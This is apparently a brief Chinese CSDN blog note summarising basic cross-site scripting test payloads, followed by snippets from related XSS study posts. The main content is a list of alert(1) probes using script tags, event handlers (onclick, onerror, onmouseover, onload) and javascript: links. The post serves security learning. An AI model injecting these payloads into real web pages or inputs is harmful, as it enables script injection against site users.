xss笔记总结

最新推荐文章于 2023-09-16 13:58:16 发布
最新推荐文章于 2023-09-16 13:58:16 发布
阅读量181 收藏 1
点赞数
分类专栏: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Long_gone/article/details/102670528
版权

普通注入

<script>alert(1)</script>

点击注入

"οnclick="alert(1)

创建链接

<a href="javascript:alert(1)">123</a>

点击创建输入框

<input onclick="alert(1)">

插入图片

<img src="123" onerror="alert(1)">
< img src=1 onmouseover="alert(1)">

其他

<svg onload="alert(1)">    
<iframe src="http://www.baidu.com" onload="alert(1)"></iframe>
Long_gone
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
06-30
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
xss 笔记
m0_37847492的博客
08-17 122
xss笔记
h0ld1rs的博客
07-27 275
xss涉及知识js中三种弹窗的简单使用alert、confirm、promptHTML DOM 事件对象报错处理 js中三种弹窗的简单使用alert、confirm、prompt 1、alert():显示带有一条指定消息和一个 OK(确认) 按钮的警告框。 写在script标签中 括号中的内容为字符串或者整型 点击确认即可关闭,无返回值 2、confirm():用于显示一个带有指定消息和 OK 及取消按钮的对话框。一般作为判断条件 写在script标签中 括号中的内容为字符串和整型 点击确认返回tru
XSS笔记
qq_63527808的博客
09-16 195
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。2、存储型XSS: 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内);
PHP学习笔记总结.doc
09-22
【PHP学习笔记总结】 PHP(超文本预处理器)是一种广泛使用的开源脚本语言,特别适合于Web开发。它能够嵌入HTML中,让开发者在服务器端处理数据,生成动态网页内容。与JavaScript不同,PHP代码在服务器上执行,然后...
安装xss-labs ppt手册
最新发布
10-22
5. **记录和总结**:在解决每个挑战后,记得做笔记,记录你的发现和解决方案。这将有助于你在以后遇到类似问题时能迅速回忆起解决策略。 6. **安全实践**:了解如何预防XSS攻击,如使用输入验证、编码输出、设置...
Go Template学习笔记
06-20
Go 模板是 Go 语言标准库中的一个重要组成部分,它用于...总结来说,Go 模板提供了一种简洁而强大的方式来生成动态内容。通过学习这些基本概念和语法,你可以更好地理解和利用 Go 模板来构建高效、安全的 Web 应用。
xss(笔记)
weixin_45291045的博客
10-30 371
文章目录xss原理xss的危害xss分类如何测试xss xss原理 xss其实就是HTML代码注入,恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 xss的危害 盗取cookie 网络钓鱼 劫持用户会话 网页挂马 等等 xss分类 反射型xss(非持久型) 一般出现在搜索框,get传参里 传参不会进入数据库,需要进行社工,诱骗管理员点击链接 存储型xss(持久型) 一般出现在,留言框,设置资料的框,各种跟数据库有
XSS学习笔记
weixin_44377940的博客
03-09 158
XSS(跨站脚本攻击)分为反射型(不持久)、存储型(存储在服务器中,持久)、DOM型。
XSS笔记分享
weixin_65386473的博客
01-15 2633
XSS 漏洞介绍 跨站脚本攻击(Cross Site Scripting),恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 xss漏洞类型: 1.反射型 XSS 反射型XSS又称非持久性XSS,这种攻击往往具有一次性。 攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接...
XSS学习笔记(入门篇)
Chris Lee
01-16 961
最近的学习速度挺快的,对于寒假的计划是对于各种知识点都了解大概并且基本懂得原理,在开学之后对相关书籍深入研究! 这里我就先总结下几个XSS应用的例子吧。 一.利用&lt; &gt;标记注射html / javascript 如果可以随心所欲引入&lt; &gt;标记,那么就可以通过script输入有javasript编写的恶意脚本代码。 eg:&lt;script&gt;alert("你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值